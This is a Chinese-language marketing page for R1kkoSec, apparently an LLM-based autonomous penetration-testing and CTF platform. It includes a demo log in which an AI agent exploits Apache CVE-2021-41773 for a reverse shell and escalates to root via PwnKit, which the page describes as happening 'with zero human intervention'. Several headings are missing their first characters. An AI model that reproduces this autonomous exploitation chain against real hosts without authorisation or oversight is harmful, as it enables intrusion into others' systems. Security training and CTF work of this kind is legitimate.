Rikka Halftone Background

始于执行。

全球领先的自主漏洞挖掘推理平台。将大语言模型的规划能力与高并发终端沙箱完美结合,拒绝幻觉,精准执行,获取 Flag 仅需一瞬。

完美集成开源安全生态系统
Kali Linux 节点 Python3 运行时 Docker 沙箱 Burp Suite

构渗透测试工业标准。

完全抛弃传统聊天机器人的“文字游戏”模式设计,R1kkoSec 深度构建了三维一体的自动化利用闭环体系。

自治侦察系统

不再需要人工输入指纹。Agent 自动分配高可用 Kali 节点执行 nmap 与 checksec,自主解析庞杂的标准输出,绘制攻击面拓扑图。

生成式漏洞利用

基于庞大安全知识库的动态上下文注入 (Dynamic RAG)。针对识别出的协议或加密算法,自动装载特定 Pwn 或 Web 攻击载荷剧本以供大模型推理。

可验证执行引擎

通过 Codex CLI relay 将任务直接送入 Kali,持续返回真实命令证据与结论,不再依赖旧的 sidecar 或多节点转发链路。

全维度自动化渗透实战双轨流演示

这是 R1kkoSec 在处理真实靶机时的底层运转逻辑:左侧大模型在感知与决策,右侧沙箱终端同步执行高危指令,全过程零人类干预。

Auto-Pentest Routine (ID: 0x8F9B)
Linked
AGENT REASONING STREAM
[THOUGHT PROCESSING]

Target initialized at 192.168.1.100. I must footprint the environment to locate running services and potential vectors.

Action: Emit Nmap Port Scan
[ANALYSIS & OBSERVATION]

Port 80 is openly hosting Apache 2.4.41. Fingerprinting indicates potential exposure to path traversal exploits. Switching to HTTP vulnerability scanning.

Action: HTTP Route Scanning
[VULNERABILITY CONFIRMED]

Apache Path Traversal (CVE-2021-41773) is viable. I can inject a reverse TCP payload into `/cgi-bin/` to force RCE execution.

Action: Execute Exploitation Draft
[POST-EXPLOITATION]

Initial foothold established. Current user is unprivileged (www-data). I need to enumerate SUID binaries for privilege escalation.

Action: SUID Traversal Search
[CRITICAL ELEVATION]

Located misconfigured `pkexec` (CVE-2021-4034). Auto-synthesizing C payload directly into memory to gain root shells.

Action: Trigger PwnKit Execution
TERMINAL SANDBOX // KALI-NODE-1
$ nmap -sV -p- 192.168.1.100
Starting Nmap 7.93 at 2026-03-27 10:45 UTC...
[+] 80/tcp open http Apache httpd 2.4.41
Nmap done: 1 IP address scanned in 3.12 seconds
$ r1_core --scan-web http://192.168.1.100
[*] Analyzing HTTP footprints & probing routes...
[!] Found unauthenticated RCE (CVE-2021-41773) via /cgi-bin/.*
[*] Payload synthesized: reverse_tcp (LHOST=10.0.0.5)
$ ./exploit_cve2021.py
[*] Sending base64 payload to /cgi-bin/.%2e/.%2e/...
[★] Reverse shell connected from 192.168.1.100:34912
www-data@target:/$ whoami
www-data
www-data@target:/$ find / -perm -4000 2>/dev/null
/usr/bin/pkexec
/usr/bin/passwd
...
www-data@target:/$ ./pkexec_exploit
[!] Triggering PwnKit Privilege Escalation...
[★] GOT ROOT.

创设计,专为实战而生。

极具创新的交互体验,在确保高度自动化的同时,保留了专家级工程师审计攻击链路的绝对控制权。

交互式执行闭环

实时的思考流与终端执行流同步呈现。系统通过原生 SSE 数据通道推送命令状态,让每一秒的利用进度都尽在掌控。

r1kkosec-agent@kali:~
$ nmap -sV -p- 192.168.1.100
Starting Nmap 7.93...
[+] 80/tcp open http Apache httpd 2.4.41
[+] 445/tcp open smb Samba 4.9.5-Debian
Nmap done: 1 IP address scanned in 12.01 seconds
$ r1_core agent --target 192.168.1.100:80
[*] Agent initialized. Analyzing HTTP footprint...
[!] Found unauthenticated RCE CVE-2021-41773
[*] Auto-generating exploitation payload...
$ ./exploit.py --bind 0.0.0.0:4444
[*] Sending payload to /cgi-bin/.%2e/.%2e/...
[★] Reverse shell connected from 192.168.1.100
www-data@target:/$ whoami
www-data
www-data@target:/$ uname -a
Linux target 5.4.0-104-generic #118-Ubuntu SMP x86_64 GNU/Linux
www-data@target:/$ ./pkexec_exploit
[!] Triggering PwnKit Privilege Escalation (CVE-2021-4034)...
[★] got root.

高并发多节点熔断

为比赛与教学场景收敛为单引擎执行链路。减少故障面,降低部署复杂度,并让每一次命令执行都更容易追踪与复盘。

LLM Node Router Trace
[10:45:01] codex exec --json --cd /root/r1kkoseccccc
relay timeout detected
[10:45:01] restarting Codex relay...
[10:45:02] codex exec --json health probe ok

持的海量攻击面与处理器架构。

无论是古老的 x86 裸机固件,还是分布式的微服务云原生安全挑战,R1kkoSec 的自适应动态预制件设计使其能够覆盖各种复杂的 CTF 与实战场景。

Kali Linux OS
Windows PE / DLL
macOS Mach-O
Android APK / DEX
ARM / RISC-V Firmware
Docker / K8s Escape
AWS / Cloud IAM
Node.js RCE
PHP Deser
Java JNDI Injection
SQL / NoSQL Dump
Python Flask / Django
Web3 / Smart Contract
Protocol / Router Pwn
RSA / AES Crypto
Zero-Day Discovery

精英群体量身打造。

竞技安全选手 (CTFers)

彻底解放双手。让 AI 处理繁琐的信息收集与脚手架代码生成,将人类顶尖的心智算力保留给最核心的逆向工程与复杂机制漏洞上。

红队渗透人员 (Red Teams)

全自动化辅助进行资产测绘、外网打点及批量漏洞验证。所有的探测行为都可以配置特定代理节点执行,保证隐蔽性和高效性。

企业安全审计 (Auditors)

生成 100% 可回放、完全客观的攻击审计日志。R1kkoSec 可以清晰展现漏洞被触发的每一步真实命令输入输出状态,拒绝模糊的漏洞报告。

什么选择 R1kkoSec?

与传统方案的全维度对比,从核心能力到实战效能的质变。

全自动端到端解题

从题目分析到 Flag 提取的完整闭环自动化。传统人工需要 30 分钟的中等难度题,R1kkoSec 仅需 42 秒。

R1kkoSec ✅ 通用 AI 🟡 仅思路

Codex 单引擎中继

直接转发到 Kali 上的 Codex CLI,减少中间层与切换策略,把稳定性建立在更短、更清晰的执行链路上。

R1kkoSec ✅ 3+ 引擎 通用 AI ❌ 单一

RAG 知识库 + Kali 工具链

7 大题型方向专家知识库注入 AI 推理。100+ Kali 安全工具全栈集成,无需手动安装和配置环境。

R1kkoSec ✅ 100+ 工具 人工 ❌

用场景与市场价值。

网络安全人才缺口超过 200 万+——R1kkoSec 正在重新定义安全人才培养效率。

高校安全实训

50亿+

替代传统人工教学,将实训效率提升 10 倍。覆盖全国 3000+ 设有网安专业的院校。

企业安全培训

80%

降低企业安全培训成本 80%。AI 驱动的自动化演练替代高成本的人工红队服务。

CTF 赛事平台

5x

将选手培养周期缩短 5 倍。自动化出题验题,为赛事组织方提供智能化基础设施。

获得属于你的数字特工。

社区版 (Community)
适合初学者与个人研究者进行基础的安全演练体验。
开源免费
永久可用
  • 单语言模型推理节点配置
  • 标准的纯文本 Web 控制台
  • 预置基础靶机利用剧本
  • 仅支持限制并发的测试任务
前往 GitHub 获取源码
企业集群 (Enterprise)
对机密靶环境与物理隔离要求极高的顶级政企研究机构。
私有化部署
专线定制联调
  • 100% 物理隔离,支持本地大模型接入 (vLLM)
  • 专用 Codex relay 节点与可回放证据链
  • 深度二次开发 SDK 与 API 源码访问权限
  • 原厂驻场级高级安全专家技术支持
联系商务经理代表